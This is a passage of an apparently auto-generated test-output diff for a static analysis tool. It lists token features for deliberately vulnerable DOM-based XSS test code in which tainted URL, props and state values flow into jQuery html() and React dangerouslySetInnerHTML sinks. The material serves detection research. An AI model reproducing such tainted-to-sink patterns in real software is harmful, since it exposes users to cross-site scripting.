URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | exceptional return of anonymous function | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | exceptional return of anonymous function | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | exceptional return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | return of anonymous function | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | return of anonymous function | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:28:230:36 | prevState | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:28:230:36 | prevState | contextSurroundingFunctionParameters | ()\n()\n(prevState, prevProps) | +| autogenerated/Xss/DomBasedXss/tst.js:230:28:230:36 | prevState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:28:230:36 | prevState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:28:230:36 | prevState | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | contextSurroundingFunctionParameters | ()\n()\n(prevState, prevProps) | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:39:230:47 | prevProps | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:17 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:17 | $ | contextSurroundingFunctionParameters | ()\n()\n(prevState, prevProps) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:17 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:17 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:17 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | $('myId') | contextSurroundingFunctionParameters | ()\n()\n(prevState, prevProps) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:25 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:30 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:30 | $('myId').html | contextSurroundingFunctionParameters | ()\n()\n(prevState, prevProps) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:30 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:30 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:30 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | $('myId ... inted4) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | $('myId ... inted4) | contextSurroundingFunctionParameters | ()\n()\n(prevState, prevProps) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | $('myId ... inted4) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | $('myId ... inted4) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | $('myId ... inted4) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | exceptional return of $('myId ... inted4) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | exceptional return of $('myId ... inted4) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | exceptional return of $('myId ... inted4) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | exceptional return of $('myId ... inted4) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:231:17:231:50 | exceptional return of $('myId ... inted4) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:231:19:231:24 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:231:19:231:24 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:231:19:231:24 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17035,6 +117954,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:231:19:231:24 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:231:19:231:24 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:231:19:231:24 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:231:27:231:30 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:231:27:231:30 | html | contextSurroundingFunctionParameters | ()\n()\n(prevState, prevProps) | +| autogenerated/Xss/DomBasedXss/tst.js:231:27:231:30 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:231:27:231:30 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:231:27:231:30 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:231:32:231:40 | prevProps | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:231:32:231:40 | prevProps | contextSurroundingFunctionParameters | ()\n()\n(prevState, prevProps) | +| autogenerated/Xss/DomBasedXss/tst.js:231:32:231:40 | prevProps | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:231:32:231:40 | prevProps | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:231:32:231:40 | prevProps | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:231:32:231:49 | prevProps.tainted4 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:231:32:231:49 | prevProps.tainted4 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:231:32:231:49 | prevProps.tainted4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17042,6 +117971,282 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:231:32:231:49 | prevProps.tainted4 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:231:32:231:49 | prevProps.tainted4 | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:231:32:231:49 | prevProps.tainted4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:231:42:231:49 | tainted4 | contextFunctionInterfaces | 